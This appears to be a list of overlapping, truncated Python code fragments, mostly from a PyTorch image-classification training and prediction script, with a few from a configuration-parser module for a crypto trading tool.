"= epoch best_model_wts = copy.deepcopy(model.state_dict()) print('Best val Loss: {:4f}'.format(math.sqrt(min_val_loss))) print(f'Epoch completed: {epoch+1}') print(f'Best",
"print_progress: Prints progress if True :return: Prediction(as a list) on test folder defined",
"import pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv) import",
"Optimizer :param num_epochs: Number of epochs :param dataloaders: Dataloaders, must be a dictionary",
"in utils test_dataset = TestDataset(data_dir+'test', sample_sub,data_transforms['test']) test_loader = torch.utils.data.DataLoader(test_dataset, batch_size=batch_size, shuffle=False) # Load",
"= 0 for iter1, (inputs, labels) in enumerate(dataloaders['train']): inputs = inputs.to(device) inputs =",
"image_datasets['valid'].class_to_idx idx_to_class = {val: key for key, val in class_to_idx.items()} def predict(model_path, dataloader,",
"'%', end='\\r') else: print() with torch.no_grad(): model.eval() for iter2, (inputs, labels) in enumerate(dataloaders['valid']):",
"preds1 = torch.max(output1, 1) # output1 = torch.mul(output1,100).to(device) loss = criterion(output1, labels) valid_loss",
"for a PyTorch model, returns a Numpy array \"\"\" img = Image.open(img_path) #",
"import math import torch.optim as optim from torch.optim import lr_scheduler import copy import",
"numpy array Scales, crops, and normalizes a PIL image for a PyTorch model,",
"torch.cuda.is_available() else \"cpu\") model.to(device) model.eval() predictions = {} with torch.no_grad(): for ii, (images,",
"= labels.type(torch.long) output1 = model(inputs) _, preds1 = torch.max(output1, 1) # output1 =",
"= top_indices.detach().cpu().numpy().tolist() # Convert indices to classes top_classes = [idx_to_class[idx[0]] for idx in",
"{x: len(image_datasets[x]) for x in ['train', 'valid']} class_names = image_datasets['train'].classes device = torch.device(\"cuda:0\"",
"train_data = config_dict['train_data'] valid_data = config_dict['valid_data'] test_data = config_dict['test_data'] # Apply transforms normalize",
"dictionary class_to_idx = image_datasets['valid'].class_to_idx idx_to_class = {val: key for key, val in class_to_idx.items()}",
"= yaml.safe_load(stream) batch_size = config_dict['batch_size'] learning_rate = config_dict['lr'] model_pth = config_dict['model_pth'] train_data =",
"criterion(out, labels) loss.backward() optimizer.step() train_loss += loss.item() * inputs.size(0) # running_corrects += torch.sum(preds",
"0.406]) # provided mean std = np.array([0.229, 0.224, 0.225]) # provided std img",
"+= loss.item() * inputs.size(0) running_corrects += torch.sum(preds1 == labels.data) print( f'Epoch: {epoch}\\t{100 *",
"= Image.open(img_path) # Resize if img.size[0] > img.size[1]: img.thumbnail((10000, 256)) else: img.thumbnail((256, 10000))",
"I/O (e.g. pd.read_csv) import os import torch import torchvision import matplotlib.pyplot as plt",
"time.time() - since print('Training complete in {:.0f}m {:.0f}s'.format(time_elapsed // 60, time_elapsed % 60))",
"10000)) # Crop Image left_margin = (img.width - 224) / 2 bottom_margin =",
"224) / 2 right_margin = left_margin + 224 top_margin = bottom_margin + 224",
"+ 1) / len(dataloaders['train']):.2f}\" + '%', end='\\r') else: print() with torch.no_grad(): model.eval() for",
"Image left_margin = (img.width - 224) / 2 bottom_margin = (img.height - 224)",
"valid_loss best_epoch = epoch best_model_wts = copy.deepcopy(model.state_dict()) print('Best val Loss: {:4f}'.format(math.sqrt(min_val_loss))) print(f'Epoch completed:",
"config_dict['train_data'] valid_data = config_dict['valid_data'] test_data = config_dict['test_data'] # Apply transforms normalize = transforms.Normalize(mean=[0.485,",
"image to be processed :returns processed numpy array Scales, crops, and normalizes a",
"enumerate(dataloaders['valid']): inputs = inputs.to(device) inputs = inputs.type(torch.float) labels = labels.to(device) labels = labels.type(torch.long)",
"train_loss = train_loss / len_train1 valid_loss = valid_loss / len_val1 if print_progress: print(",
"// 60, time_elapsed % 60)) print(f'Accuracy : {100 * running_corrects / len_val1} %')",
"labels.to(device) labels = labels.type(torch.long) optimizer.zero_grad() out = model(inputs) _, preds = torch.max(out, 1)",
"Prints progress if True :return: Prediction(as a list) on test folder defined by",
"data_transforms = { 'train': transforms.Compose([ transforms.Resize((230, 230)), transforms.RandomRotation(30,), transforms.RandomCrop(224), transforms.RandomHorizontalFlip(), transforms.RandomVerticalFlip(), transforms.ToTensor(), normalize",
"val Loss: {:4f}'.format(math.sqrt(min_val_loss))) print(f'Epoch completed: {epoch+1}') print(f'Best Epoch: {best_epoch+1}') model.load_state_dict(best_model_wts) return model def",
"loss = criterion(output1, labels) valid_loss += loss.item() * inputs.size(0) running_corrects += torch.sum(preds1 ==",
"= open(\"config.yaml\", 'r') config_dict = yaml.safe_load(stream) batch_size = config_dict['batch_size'] learning_rate = config_dict['lr'] model_pth",
"0 for iter1, (inputs, labels) in enumerate(dataloaders['train']): inputs = inputs.to(device) inputs = inputs.type(torch.float)",
"os import torch import torchvision import matplotlib.pyplot as plt import seaborn as sns",
"Load dataloaders image_datasets = {x: datasets.ImageFolder(os.path.join(data_dir, x), data_transforms[x]) for x in ['train', 'valid']}",
"len(dataloaders[\"valid\"]):.2f} %', end='\\r') len_train1 = 6552 len_val1 = len(dataloaders['valid'].dataset) train_loss = train_loss /",
"Crop Image left_margin = (img.width - 224) / 2 bottom_margin = (img.height -",
"import matplotlib.pyplot as plt import seaborn as sns import torch.nn as nn from",
"= 0.0 train_loss = 0.0 model.train() running_corrects = 0 for iter1, (inputs, labels)",
"model.train() running_corrects = 0 for iter1, (inputs, labels) in enumerate(dataloaders['train']): inputs = inputs.to(device)",
"# Resize if img.size[0] > img.size[1]: img.thumbnail((10000, 256)) else: img.thumbnail((256, 10000)) # Crop",
"inputs.size(0) # running_corrects += torch.sum(preds == labels.data) if print_progress: print( f\"Epoch: {epoch}\\t{100 *",
"labels) loss.backward() optimizer.step() train_loss += loss.item() * inputs.size(0) # running_corrects += torch.sum(preds ==",
"config_dict['lr'] model_pth = config_dict['model_pth'] train_data = config_dict['train_data'] valid_data = config_dict['valid_data'] test_data = config_dict['test_data']",
"# provided mean std = np.array([0.229, 0.224, 0.225]) # provided std img =",
"= inputs.type(torch.float) labels = labels.to(device) labels = labels.type(torch.long) optimizer.zero_grad() out = model(inputs) _,",
"if print_progress: if ii % 5 == 0: print('Batch {}/{}'.format(ii, len(dataloader))) images =",
"+ '%', end='\\r') else: print() with torch.no_grad(): model.eval() for iter2, (inputs, labels) in",
"Path of image to be processed :returns processed numpy array Scales, crops, and",
"a PyTorch model, returns a Numpy array \"\"\" img = Image.open(img_path) # Resize",
"min_val_loss = valid_loss best_epoch = epoch best_model_wts = copy.deepcopy(model.state_dict()) print('Best val Loss: {:4f}'.format(math.sqrt(min_val_loss)))",
"img = np.array(img) / 255 mean = np.array([0.485, 0.456, 0.406]) # provided mean",
"(img.width - 224) / 2 bottom_margin = (img.height - 224) / 2 right_margin",
"{100 * running_corrects / len_val1} %') if valid_loss < min_val_loss: min_val_loss = valid_loss",
"{epoch+1}') print(f'Best Epoch: {best_epoch+1}') model.load_state_dict(best_model_wts) return model def process_image(img_path): \"\"\" :param img_path: Path",
"PyTorch model, returns a Numpy array \"\"\" img = Image.open(img_path) # Resize if",
"Path of Model used for prediction :param dataloader: Test DataLoader :param print_progress: Prints",
"by config file \"\"\" model = torch.load(model_path) device = torch.device(\"cuda\" if torch.cuda.is_available() else",
"_, top_indices = ps.topk(1) top_indices = top_indices.detach().cpu().numpy().tolist() # Convert indices to classes top_classes",
"# out = torch.mul(out,100) loss = criterion(out, labels) loss.backward() optimizer.step() train_loss += loss.item()",
"= os.path.join(data_dir, 'test') sample_sub = pd.read_csv(os.path.join(data_dir, 'sample_submission.csv')) sample_sub['path'] = sample_sub['file_name'].apply(lambda x: os.path.join(test_path, x))",
"- mean) / std return img # Load test dataset from class defined",
"complete in {:.0f}m {:.0f}s'.format(time_elapsed // 60, time_elapsed % 60)) print(f'Accuracy : {100 *",
"import time from PIL import Image from datetime import datetime from utils import",
"# Get configs from config file stream = open(\"config.yaml\", 'r') config_dict = yaml.safe_load(stream)",
"Numpy array \"\"\" img = Image.open(img_path) # Resize if img.size[0] > img.size[1]: img.thumbnail((10000,",
"open(\"config.yaml\", 'r') config_dict = yaml.safe_load(stream) batch_size = config_dict['batch_size'] learning_rate = config_dict['lr'] model_pth =",
"]), } # Load dataloaders image_datasets = {x: datasets.ImageFolder(os.path.join(data_dir, x), data_transforms[x]) for x",
"provided std img = (img - mean) / std return img # Load",
"['train', 'valid']} dataset_sizes = {x: len(image_datasets[x]) for x in ['train', 'valid']} class_names =",
"% 5 == 0: print('Batch {}/{}'.format(ii, len(dataloader))) images = images.to(device) logps = model(images)",
"# Convert indices to classes top_classes = [idx_to_class[idx[0]] for idx in top_indices] #",
"datasets.ImageFolder(os.path.join(data_dir, x), data_transforms[x]) for x in ['train', 'valid']} dataloaders = {x: torch.utils.data.DataLoader(image_datasets[x], batch_size=batch_size,",
"print( f'\\nEpoch: {epoch + 1} \\tTraining Loss: {math.sqrt(train_loss):.4f} \\tValidation Loss: {math.sqrt(valid_loss):.4f}') time_elapsed =",
"val as keys :param print_progress: prints progress if true :return: trained model object",
"processed :returns processed numpy array Scales, crops, and normalizes a PIL image for",
"copy.deepcopy(model.state_dict()) print('Best val Loss: {:4f}'.format(math.sqrt(min_val_loss))) print(f'Epoch completed: {epoch+1}') print(f'Best Epoch: {best_epoch+1}') model.load_state_dict(best_model_wts) return",
"transforms.Compose([ transforms.Resize((230, 230)), transforms.RandomRotation(30,), transforms.RandomCrop(224), transforms.RandomHorizontalFlip(), transforms.RandomVerticalFlip(), transforms.ToTensor(), normalize ]), 'valid': transforms.Compose([ transforms.Resize((400,",
"in ['train', 'valid']} class_names = image_datasets['train'].classes device = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")",
"= np.Inf best_model_wts = copy.deepcopy(model.state_dict()) since = time.time() best_epoch = -1 for epoch",
"= torch.exp(logps) # Top indices _, top_indices = ps.topk(1) top_indices = top_indices.detach().cpu().numpy().tolist() #",
"= [idx_to_class[idx[0]] for idx in top_indices] # print(\"Img:\" ,img_names) for i, img_name in",
"pd # data processing, CSV file I/O (e.g. pd.read_csv) import os import torch",
"keys :param print_progress: prints progress if true :return: trained model object \"\"\" min_val_loss",
"= criterion(out, labels) loss.backward() optimizer.step() train_loss += loss.item() * inputs.size(0) # running_corrects +=",
"normalize = transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]) data_transforms = { 'train': transforms.Compose([",
"labels.type(torch.long) output1 = model(inputs) _, preds1 = torch.max(output1, 1) # output1 = torch.mul(output1,100).to(device)",
"idx in top_indices] # print(\"Img:\" ,img_names) for i, img_name in enumerate(img_names): predictions[img_name] =",
"= inputs.to(device) inputs = inputs.type(torch.float) labels = labels.to(device) labels = labels.type(torch.long) output1 =",
"in enumerate(dataloaders['train']): inputs = inputs.to(device) inputs = inputs.type(torch.float) labels = labels.to(device) labels =",
"DataLoader :param print_progress: Prints progress if True :return: Prediction(as a list) on test",
"sample_sub = pd.read_csv(os.path.join(data_dir, 'sample_submission.csv')) sample_sub['path'] = sample_sub['file_name'].apply(lambda x: os.path.join(test_path, x)) # Get configs",
"Prediction(as a list) on test folder defined by config file \"\"\" model =",
"sample_sub['file_name'].apply(lambda x: os.path.join(test_path, x)) # Get configs from config file stream = open(\"config.yaml\",",
"end='\\r') len_train1 = 6552 len_val1 = len(dataloaders['valid'].dataset) train_loss = train_loss / len_train1 valid_loss",
"x)) # Get configs from config file stream = open(\"config.yaml\", 'r') config_dict =",
"config_dict['valid_data'] test_data = config_dict['test_data'] # Apply transforms normalize = transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229,",
":param criterion: Loss function :param optimizer: Optimizer :param num_epochs: Number of epochs :param",
"img.size[0] > img.size[1]: img.thumbnail((10000, 256)) else: img.thumbnail((256, 10000)) # Crop Image left_margin =",
"predict(model_path, dataloader, print_progress=False): \"\"\" :param model_path: Path of Model used for prediction :param",
"} # Load dataloaders image_datasets = {x: datasets.ImageFolder(os.path.join(data_dir, x), data_transforms[x]) for x in",
"transforms from torchvision import datasets,models import math import torch.optim as optim from torch.optim",
"labels = labels.to(device) labels = labels.type(torch.long) output1 = model(inputs) _, preds1 = torch.max(output1,",
"img_path: Path of image to be processed :returns processed numpy array Scales, crops,",
"= left_margin + 224 top_margin = bottom_margin + 224 img = img.crop((left_margin, bottom_margin,",
"model.eval() for iter2, (inputs, labels) in enumerate(dataloaders['valid']): inputs = inputs.to(device) inputs = inputs.type(torch.float)",
"{x: datasets.ImageFolder(os.path.join(data_dir, x), data_transforms[x]) for x in ['train', 'valid']} dataloaders = {x: torch.utils.data.DataLoader(image_datasets[x],",
"Class to idx dictionary class_to_idx = image_datasets['valid'].class_to_idx idx_to_class = {val: key for key,",
"image for a PyTorch model, returns a Numpy array \"\"\" img = Image.open(img_path)",
"train_loss += loss.item() * inputs.size(0) # running_corrects += torch.sum(preds == labels.data) if print_progress:",
"pd.read_csv(os.path.join(data_dir, 'sample_submission.csv')) sample_sub['path'] = sample_sub['file_name'].apply(lambda x: os.path.join(test_path, x)) # Get configs from config",
"'valid']} class_names = image_datasets['train'].classes device = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\") # Trains",
"range(num_epochs): valid_loss = 0.0 train_loss = 0.0 model.train() running_corrects = 0 for iter1,",
"dataloaders image_datasets = {x: datasets.ImageFolder(os.path.join(data_dir, x), data_transforms[x]) for x in ['train', 'valid']} dataloaders",
"CSV file I/O (e.g. pd.read_csv) import os import torch import torchvision import matplotlib.pyplot",
"Model used for prediction :param dataloader: Test DataLoader :param print_progress: Prints progress if",
"running_corrects / len_val1} %') if valid_loss < min_val_loss: min_val_loss = valid_loss best_epoch =",
"= train_loss / len_train1 valid_loss = valid_loss / len_val1 if print_progress: print( f'\\nEpoch:",
"true :return: trained model object \"\"\" min_val_loss = np.Inf best_model_wts = copy.deepcopy(model.state_dict()) since",
"dataset_sizes = {x: len(image_datasets[x]) for x in ['train', 'valid']} class_names = image_datasets['train'].classes device",
",img_names) for i, img_name in enumerate(img_names): predictions[img_name] = top_classes[i] print('\\nPrediction Generation Completed') return",
"out = torch.mul(out,100) loss = criterion(out, labels) loss.backward() optimizer.step() train_loss += loss.item() *",
":return: trained model object \"\"\" min_val_loss = np.Inf best_model_wts = copy.deepcopy(model.state_dict()) since =",
"img = (img - mean) / std return img # Load test dataset",
"for key, val in class_to_idx.items()} def predict(model_path, dataloader, print_progress=False): \"\"\" :param model_path: Path",
"idx_to_class = {val: key for key, val in class_to_idx.items()} def predict(model_path, dataloader, print_progress=False):",
"be a dictionary having train and val as keys :param print_progress: prints progress",
"labels.data) print( f'Epoch: {epoch}\\t{100 * (iter2 + 1) / len(dataloaders[\"valid\"]):.2f} %', end='\\r') len_train1",
"\"\"\" img = Image.open(img_path) # Resize if img.size[0] > img.size[1]: img.thumbnail((10000, 256)) else:",
"dataloader: Test DataLoader :param print_progress: Prints progress if True :return: Prediction(as a list)",
"processed numpy array Scales, crops, and normalizes a PIL image for a PyTorch",
"for i, img_name in enumerate(img_names): predictions[img_name] = top_classes[i] print('\\nPrediction Generation Completed') return predictions",
"for iter2, (inputs, labels) in enumerate(dataloaders['valid']): inputs = inputs.to(device) inputs = inputs.type(torch.float) labels",
"{ 'train': transforms.Compose([ transforms.Resize((230, 230)), transforms.RandomRotation(30,), transforms.RandomCrop(224), transforms.RandomHorizontalFlip(), transforms.RandomVerticalFlip(), transforms.ToTensor(), normalize ]), 'valid':",
"a dictionary having train and val as keys :param print_progress: prints progress if",
"torch.exp(logps) # Top indices _, top_indices = ps.topk(1) top_indices = top_indices.detach().cpu().numpy().tolist() # Convert",
"labels.data) if print_progress: print( f\"Epoch: {epoch}\\t{100 * (iter1 + 1) / len(dataloaders['train']):.2f}\" +",
"matplotlib.pyplot as plt import seaborn as sns import torch.nn as nn from torch.utils.data",
"= config_dict['lr'] model_pth = config_dict['model_pth'] train_data = config_dict['train_data'] valid_data = config_dict['valid_data'] test_data =",
"['train', 'valid']} dataloaders = {x: torch.utils.data.DataLoader(image_datasets[x], batch_size=batch_size, shuffle= True, num_workers=0) for x in",
"optimizer: Optimizer :param num_epochs: Number of epochs :param dataloaders: Dataloaders, must be a",
"x in ['train', 'valid']} dataset_sizes = {x: len(image_datasets[x]) for x in ['train', 'valid']}",
"type object :param criterion: Loss function :param optimizer: Optimizer :param num_epochs: Number of",
"= config_dict['train_data'] valid_data = config_dict['valid_data'] test_data = config_dict['test_data'] # Apply transforms normalize =",
"transforms.RandomHorizontalFlip(), transforms.RandomVerticalFlip(), transforms.ToTensor(), normalize ]), 'valid': transforms.Compose([ transforms.Resize((400, 400)), transforms.CenterCrop((224, 224)), transforms.ToTensor(), normalize",
"= torch.max(output1, 1) # output1 = torch.mul(output1,100).to(device) loss = criterion(output1, labels) valid_loss +=",
"as nn from torch.utils.data import Dataset, DataLoader import torchvision.transforms as transforms from torchvision",
"* inputs.size(0) # running_corrects += torch.sum(preds == labels.data) if print_progress: print( f\"Epoch: {epoch}\\t{100",
"\"\"\" min_val_loss = np.Inf best_model_wts = copy.deepcopy(model.state_dict()) since = time.time() best_epoch = -1",
"from PIL import Image from datetime import datetime from utils import * data_dir",
"from torchvision import datasets,models import math import torch.optim as optim from torch.optim import",
"(inputs, labels) in enumerate(dataloaders['valid']): inputs = inputs.to(device) inputs = inputs.type(torch.float) labels = labels.to(device)",
"img = img.crop((left_margin, bottom_margin, right_margin, top_margin)) # Normalize img = np.array(img) / 255",
"print('Batch {}/{}'.format(ii, len(dataloader))) images = images.to(device) logps = model(images) ps = torch.exp(logps) #",
"print(\"Img:\" ,img_names) for i, img_name in enumerate(img_names): predictions[img_name] = top_classes[i] print('\\nPrediction Generation Completed')",
"torch.utils.data.DataLoader(test_dataset, batch_size=batch_size, shuffle=False) # Load Class to idx dictionary class_to_idx = image_datasets['valid'].class_to_idx idx_to_class",
"epoch in range(num_epochs): valid_loss = 0.0 train_loss = 0.0 model.train() running_corrects = 0",
"if true :return: trained model object \"\"\" min_val_loss = np.Inf best_model_wts = copy.deepcopy(model.state_dict())",
"import torchvision import matplotlib.pyplot as plt import seaborn as sns import torch.nn as",
"= inputs.type(torch.float) labels = labels.to(device) labels = labels.type(torch.long) output1 = model(inputs) _, preds1",
"= model(inputs) _, preds = torch.max(out, 1) # out = torch.mul(out,100) loss =",
"x: os.path.join(test_path, x)) # Get configs from config file stream = open(\"config.yaml\", 'r')",
"= valid_loss best_epoch = epoch best_model_wts = copy.deepcopy(model.state_dict()) print('Best val Loss: {:4f}'.format(math.sqrt(min_val_loss))) print(f'Epoch",
"= criterion(output1, labels) valid_loss += loss.item() * inputs.size(0) running_corrects += torch.sum(preds1 == labels.data)",
"model, returns a Numpy array \"\"\" img = Image.open(img_path) # Resize if img.size[0]",
"time.time() best_epoch = -1 for epoch in range(num_epochs): valid_loss = 0.0 train_loss =",
"Resize if img.size[0] > img.size[1]: img.thumbnail((10000, 256)) else: img.thumbnail((256, 10000)) # Crop Image",
"loss.backward() optimizer.step() train_loss += loss.item() * inputs.size(0) # running_corrects += torch.sum(preds == labels.data)",
"labels.type(torch.long) optimizer.zero_grad() out = model(inputs) _, preds = torch.max(out, 1) # out =",
"configs from config file stream = open(\"config.yaml\", 'r') config_dict = yaml.safe_load(stream) batch_size =",
"transforms.ToTensor(), normalize ]), } # Load dataloaders image_datasets = {x: datasets.ImageFolder(os.path.join(data_dir, x), data_transforms[x])",
"and val as keys :param print_progress: prints progress if true :return: trained model",
"img.thumbnail((256, 10000)) # Crop Image left_margin = (img.width - 224) / 2 bottom_margin",
"= image_datasets['train'].classes device = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\") # Trains Model def",
"Model def train_model2(model, criterion, optimizer, num_epochs=3, dataloaders= dataloaders, print_progress=False): \"\"\" :param model: Model",
"best_epoch = -1 for epoch in range(num_epochs): valid_loss = 0.0 train_loss = 0.0",
"os.path.join(test_path, x)) # Get configs from config file stream = open(\"config.yaml\", 'r') config_dict",
"mean) / std return img # Load test dataset from class defined in",
"= torch.mul(out,100) loss = criterion(out, labels) loss.backward() optimizer.step() train_loss += loss.item() * inputs.size(0)",
"= config_dict['test_data'] # Apply transforms normalize = transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])",
"1} \\tTraining Loss: {math.sqrt(train_loss):.4f} \\tValidation Loss: {math.sqrt(valid_loss):.4f}') time_elapsed = time.time() - since print('Training",
"\\tValidation Loss: {math.sqrt(valid_loss):.4f}') time_elapsed = time.time() - since print('Training complete in {:.0f}m {:.0f}s'.format(time_elapsed",
"valid_loss = valid_loss / len_val1 if print_progress: print( f'\\nEpoch: {epoch + 1} \\tTraining",
"nn from torch.utils.data import Dataset, DataLoader import torchvision.transforms as transforms from torchvision import",
"+ 1) / len(dataloaders[\"valid\"]):.2f} %', end='\\r') len_train1 = 6552 len_val1 = len(dataloaders['valid'].dataset) train_loss",
"inputs = inputs.type(torch.float) labels = labels.to(device) labels = labels.type(torch.long) optimizer.zero_grad() out = model(inputs)",
":param model: Model type object :param criterion: Loss function :param optimizer: Optimizer :param",
"transforms.RandomCrop(224), transforms.RandomHorizontalFlip(), transforms.RandomVerticalFlip(), transforms.ToTensor(), normalize ]), 'valid': transforms.Compose([ transforms.Resize((400, 400)), transforms.CenterCrop((224, 224)), transforms.ToTensor(),",
"num_epochs: Number of epochs :param dataloaders: Dataloaders, must be a dictionary having train",
"predictions = {} with torch.no_grad(): for ii, (images, _, img_names) in enumerate(dataloader, start=1):",
"# Trains Model def train_model2(model, criterion, optimizer, num_epochs=3, dataloaders= dataloaders, print_progress=False): \"\"\" :param",
"= torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\") model.to(device) model.eval() predictions = {} with torch.no_grad():",
"np.array([0.229, 0.224, 0.225]) # provided std img = (img - mean) / std",
"criterion, optimizer, num_epochs=3, dataloaders= dataloaders, print_progress=False): \"\"\" :param model: Model type object :param",
"iter1, (inputs, labels) in enumerate(dataloaders['train']): inputs = inputs.to(device) inputs = inputs.type(torch.float) labels =",
"to idx dictionary class_to_idx = image_datasets['valid'].class_to_idx idx_to_class = {val: key for key, val",
"labels.to(device) labels = labels.type(torch.long) output1 = model(inputs) _, preds1 = torch.max(output1, 1) #",
"import torch.optim as optim from torch.optim import lr_scheduler import copy import time from",
"print('Best val Loss: {:4f}'.format(math.sqrt(min_val_loss))) print(f'Epoch completed: {epoch+1}') print(f'Best Epoch: {best_epoch+1}') model.load_state_dict(best_model_wts) return model",
"config_dict['test_data'] # Apply transforms normalize = transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]) data_transforms",
"/ len_train1 valid_loss = valid_loss / len_val1 if print_progress: print( f'\\nEpoch: {epoch +",
"else: print() with torch.no_grad(): model.eval() for iter2, (inputs, labels) in enumerate(dataloaders['valid']): inputs =",
"returns a Numpy array \"\"\" img = Image.open(img_path) # Resize if img.size[0] >",
"2 right_margin = left_margin + 224 top_margin = bottom_margin + 224 img =",
"+ 224 img = img.crop((left_margin, bottom_margin, right_margin, top_margin)) # Normalize img = np.array(img)",
"since print('Training complete in {:.0f}m {:.0f}s'.format(time_elapsed // 60, time_elapsed % 60)) print(f'Accuracy :",
"with torch.no_grad(): for ii, (images, _, img_names) in enumerate(dataloader, start=1): if print_progress: if",
"import torchvision.transforms as transforms from torchvision import datasets,models import math import torch.optim as",
"Test DataLoader :param print_progress: Prints progress if True :return: Prediction(as a list) on",
"= ps.topk(1) top_indices = top_indices.detach().cpu().numpy().tolist() # Convert indices to classes top_classes = [idx_to_class[idx[0]]",
"torchvision.transforms as transforms from torchvision import datasets,models import math import torch.optim as optim",
"for x in ['train', 'valid']} dataloaders = {x: torch.utils.data.DataLoader(image_datasets[x], batch_size=batch_size, shuffle= True, num_workers=0)",
"process_image(img_path): \"\"\" :param img_path: Path of image to be processed :returns processed numpy"
] |
[
"case sensitive for file_name in file_names: found = parser.read(file_name) raw_file_name = result =",
"except Exception: logger.error(\"Cannot find %s precision: %s %s, using default\" % (meta, name.lower(),",
"pprint import pprint import os from dquant.constants import Constants from dquant.util import Util",
"name in section_names: self.__config_dict[group].update(parser.items(name)) def pretty_print(self): pprint(self.__config_dict) def get_config_base(self, state, key): try: result",
"file_name.split('/')[-1] group = Util.slice_till_dot(raw_file_name) if not found: raise ValueError('No config file found!') for",
"'price', 'amount'] return_list = [] for meta in metas: cfg_name = \"{}_{}_{}\".format(name.lower(), symbol.lower(),",
"in section_names: self.__config_dict[group].update(parser.items(name)) def pretty_print(self): pprint(self.__config_dict) def get_config_base(self, state, key): try: result =",
"self.get_config(key) == 'true' or self.get_config(key) == 'True' def get_precisions(self, name, symbol): # bitfinex_ethusdt_amount",
"def get_float_config(self, key): return float(self.get_config(key)) def get_bool_config(self, key): return self.get_config(key) == 'true' or",
"found: raise ValueError('No config file found!') for name in section_names: self.__config_dict[group].update(parser.items(name)) def pretty_print(self):",
"def pretty_print(self): pprint(self.__config_dict) def get_config_base(self, state, key): try: result = self.__config_dict[state][key] logger.info(\"key={}, result={}\".format(key,",
"Exception: logger.error(\"Cannot find %s precision: %s %s, using default\" % (meta, name.lower(), symbol.lower()))",
"file found!') for name in section_names: self.__config_dict[group].update(parser.items(name)) def pretty_print(self): pprint(self.__config_dict) def get_config_base(self, state,",
"'bitfinex', 'binance', 'mongo', 'huobi', 'redis', 'monitor', 'customized_precisions' class MyConfiguration(): __config_dict = collections.defaultdict(dict) def",
"= ['min_amount', 'price', 'amount'] return_list = [] for meta in metas: cfg_name =",
"symbol.lower(), meta) try: ret = None if meta == 'min_amount': ret = self.get_float_config(cfg_name)",
"dquant.constants import Constants from dquant.util import Util # logging.basicConfig(level=logging.INFO) # print(__name__) logger =",
"import Constants from dquant.util import Util # logging.basicConfig(level=logging.INFO) # print(__name__) logger = logging.getLogger(__name__)",
"Constants from dquant.util import Util # logging.basicConfig(level=logging.INFO) # print(__name__) logger = logging.getLogger(__name__) section_names",
"parser.optionxform = str # make option names case sensitive for file_name in file_names:",
"__init__(self, *file_names): parser = ConfigParser() parser.optionxform = str # make option names case",
"not found: raise ValueError('No config file found!') for name in section_names: self.__config_dict[group].update(parser.items(name)) def",
"self.get_config(key) == 'True' def get_precisions(self, name, symbol): # bitfinex_ethusdt_amount metas = ['min_amount', 'price',",
"\"{}_{}_{}\".format(name.lower(), symbol.lower(), meta) try: ret = None if meta == 'min_amount': ret =",
"%s %s, using default\" % (meta, name.lower(), symbol.lower())) finally: return_list.append(ret) return return_list cfg",
"class MyConfiguration(): __config_dict = collections.defaultdict(dict) def __init__(self, *file_names): parser = ConfigParser() parser.optionxform =",
"parser.read(file_name) raw_file_name = result = file_name.split('/')[-1] group = Util.slice_till_dot(raw_file_name) if not found: raise",
"from configparser import ConfigParser from pprint import pprint import os from dquant.constants import",
"logger.info(\"key={}, result={}\".format(key, result)) return result except KeyError: logger.error(KeyError) def get_config(self, key): return self.get_config_base(os.environ.get(Constants.DQUANT_ENV),",
"key) def get_int_config(self, key): return int(self.get_config(key)) def get_float_config(self, key): return float(self.get_config(key)) def get_bool_config(self,",
"'fortest', 'datadog', 'influxdb', 'okex', 'okex_future', 'bitmex', 'bitfinex', 'binance', 'mongo', 'huobi', 'redis', 'monitor', 'customized_precisions'",
"# logging.basicConfig(level=logging.INFO) # print(__name__) logger = logging.getLogger(__name__) section_names = 'fortest', 'datadog', 'influxdb', 'okex',",
"# bitfinex_ethusdt_amount metas = ['min_amount', 'price', 'amount'] return_list = [] for meta in",
"self.__config_dict[state][key] logger.info(\"key={}, result={}\".format(key, result)) return result except KeyError: logger.error(KeyError) def get_config(self, key): return",
"logging.basicConfig(level=logging.INFO) # print(__name__) logger = logging.getLogger(__name__) section_names = 'fortest', 'datadog', 'influxdb', 'okex', 'okex_future',",
"pprint import os from dquant.constants import Constants from dquant.util import Util # logging.basicConfig(level=logging.INFO)",
"file_name in file_names: found = parser.read(file_name) raw_file_name = result = file_name.split('/')[-1] group =",
"for meta in metas: cfg_name = \"{}_{}_{}\".format(name.lower(), symbol.lower(), meta) try: ret = None",
"meta == 'min_amount': ret = self.get_float_config(cfg_name) else: ret = self.get_int_config(cfg_name) except Exception: logger.error(\"Cannot",
"= self.get_int_config(cfg_name) except Exception: logger.error(\"Cannot find %s precision: %s %s, using default\" %",
"== 'True' def get_precisions(self, name, symbol): # bitfinex_ethusdt_amount metas = ['min_amount', 'price', 'amount']",
"def __init__(self, *file_names): parser = ConfigParser() parser.optionxform = str # make option names",
"# print(__name__) logger = logging.getLogger(__name__) section_names = 'fortest', 'datadog', 'influxdb', 'okex', 'okex_future', 'bitmex',",
"*file_names): parser = ConfigParser() parser.optionxform = str # make option names case sensitive",
"bitfinex_ethusdt_amount metas = ['min_amount', 'price', 'amount'] return_list = [] for meta in metas:",
"pretty_print(self): pprint(self.__config_dict) def get_config_base(self, state, key): try: result = self.__config_dict[state][key] logger.info(\"key={}, result={}\".format(key, result))",
"= str # make option names case sensitive for file_name in file_names: found",
"= None if meta == 'min_amount': ret = self.get_float_config(cfg_name) else: ret = self.get_int_config(cfg_name)",
"return result except KeyError: logger.error(KeyError) def get_config(self, key): return self.get_config_base(os.environ.get(Constants.DQUANT_ENV), key) def get_int_config(self,",
"'redis', 'monitor', 'customized_precisions' class MyConfiguration(): __config_dict = collections.defaultdict(dict) def __init__(self, *file_names): parser =",
"ret = None if meta == 'min_amount': ret = self.get_float_config(cfg_name) else: ret =",
"get_int_config(self, key): return int(self.get_config(key)) def get_float_config(self, key): return float(self.get_config(key)) def get_bool_config(self, key): return",
"dquant.util import Util # logging.basicConfig(level=logging.INFO) # print(__name__) logger = logging.getLogger(__name__) section_names = 'fortest',",
"return self.get_config_base(os.environ.get(Constants.DQUANT_ENV), key) def get_int_config(self, key): return int(self.get_config(key)) def get_float_config(self, key): return float(self.get_config(key))",
